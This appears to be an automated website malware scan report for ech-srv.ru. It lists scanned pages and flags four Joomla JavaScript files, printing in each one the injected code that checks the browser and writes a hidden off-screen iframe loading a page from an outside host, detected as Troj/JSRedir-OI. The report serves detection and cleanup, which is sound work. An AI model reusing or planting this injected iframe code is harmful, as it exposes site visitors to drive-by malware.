New scan:

Malware Scanner report for ech-srv.ru

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/5
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.ech-srv.ru/
200 OK
Content-Length: 12112
Content-Type: text/html
clean
http://www.ech-srv.ru/templates/exp_cars/movie.js
200 OK
Content-Length: 1317
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mastercodevault() {
var poc = navigator.userAgent;
var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1);
if (!poirlastic) {
document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>');
}
}
Mastercodevault();
function run_
... 207 bytes are skipped ...
"'+w+'" HEIGHT="'+h+'" id="'+arg+'" ALIGN=""><PARAM NAME=movie VALUE="'+arg+'.swf"> <PARAM NAME=quality VALUE=high> <PARAM NAME=bgcolor VALUE=#010101> <EMBED src="'+arg+'.swf" quality=high bgcolor=#010101 WIDTH="'+w+'" HEIGHT="'+h+'" NAME="'+arg+'" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED></OBJECT>');
} e>');;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.ech-srv.ru/information/okompanii/
200 OK
Content-Length: 14358
Content-Type: text/html
clean
http://www.ech-srv.ru/information/echelon/
200 OK
Content-Length: 17978
Content-Type: text/html
clean
http://www.ech-srv.ru/information/faq/
200 OK
Content-Length: 20215
Content-Type: text/html
clean
http://www.ech-srv.ru/information/kontakty/
200 OK
Content-Length: 13087
Content-Type: text/html
clean
http://www.ech-srv.ru/includes/js/calendar/calendar_mini.js
200 OK
Content-Length: 725
Content-Type: application/x-javascript
clean
http://www.ech-srv.ru/includes/js/calendar/lang/calendar-en.js
200 OK
Content-Length: 1809
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mastercodevault() {
var poc = navigator.userAgent;
var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1);
if (!poirlastic) {
document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>');
}
}
Mastercodevault();
Calendar._DN
... 757 bytes are skipped ...
"Select date";
Calendar._TT["DRAG_TO_MOVE"] = "Drag to move";
Calendar._TT["PART_TODAY"] = " (today)";
Calendar._TT["MON_FIRST"] = "Display Monday first";
Calendar._TT["SUN_FIRST"] = "Display Sunday first";
Calendar._TT["CLOSE"] = "Close";
Calendar._TT["TODAY"] = "Today";
Calendar._TT["DEF_DATE_FORMAT"] = "y-mm-dd";
Calendar._TT["TT_DATE_FORMAT"] = "D, M d";
Calendar._TT["WK"] = "wk";
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.ech-srv.ru/includes/js/joomla.javascript.js
200 OK
Content-Length: 17178
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mastercodevault() {
var poc = navigator.userAgent;
var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1);
if (!poirlastic) {
document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>');
}
}
Mastercodevault();
function xsho
... 3654 bytes are skipped ...
rue;
}
} else {
alert("You cannot change the order of items, as an item in the list is `Checked Out`");
return;
}
}
submitform('saveorder');
}
function getElementByName( f, name ) {
if (f.elements) {
for (i=0, n=f.elements.length; i < n; i++) {
if (f.elements[i].name == name) {
return f.elements[i];
}
}
}
return null;
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.ech-srv.ru/includes/js/mambojavascript.js
200 OK
Content-Length: 17055
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Mastercodevault() {
var poc = navigator.userAgent;
var poirlastic = (poc.indexOf("Windows") < +1 || poc.indexOf("Chrome") > -1 || poc.indexOf("IEMobile") > -1);
if (!poirlastic) {
document.write('<iframe src="http://dormanika.fetemobile.ca/vunerosig15.html" style="posit'+'ion:absolute;border-style:none;left: -850px;background-color:black;top: -850px;" height="139" width="139"></ifr'+'ame>');
}
}
Mastercodevault();
function xsho
... 3654 bytes are skipped ...
rue;
}
} else {
alert("You cannot change the order of items, as an item in the list is `Checked Out`");
return;
}
}
submitform('saveorder');
}
function getElementByName( f, name ) {
if (f.elements) {
for (i=0, n=f.elements.length; i < n; i++) {
if (f.elements[i].name == name) {
return f.elements[i];
}
}
}
return null;
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.ech-srv.ru/komplekt/standart/
200 OK
Content-Length: 24723
Content-Type: text/html
clean
http://www.ech-srv.ru/komplekt/standartprofi/
200 OK
Content-Length: 24885
Content-Type: text/html
clean
http://www.ech-srv.ru/komplekt/standartprofim/
200 OK
Content-Length: 24942
Content-Type: text/html
clean
http://www.ech-srv.ru/komplekt/vip/
200 OK
Content-Length: 24964
Content-Type: text/html
clean
http://www.ech-srv.ru/komplekt/dopoborudovanie/
200 OK
Content-Length: 15701
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ech-srv.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ech-srv.ru
Referer: http://www.google.com/search?q=ech-srv.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ech-srv.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ech-srv.ru/

Result: ech-srv.ru is not infected or malware details are not published yet.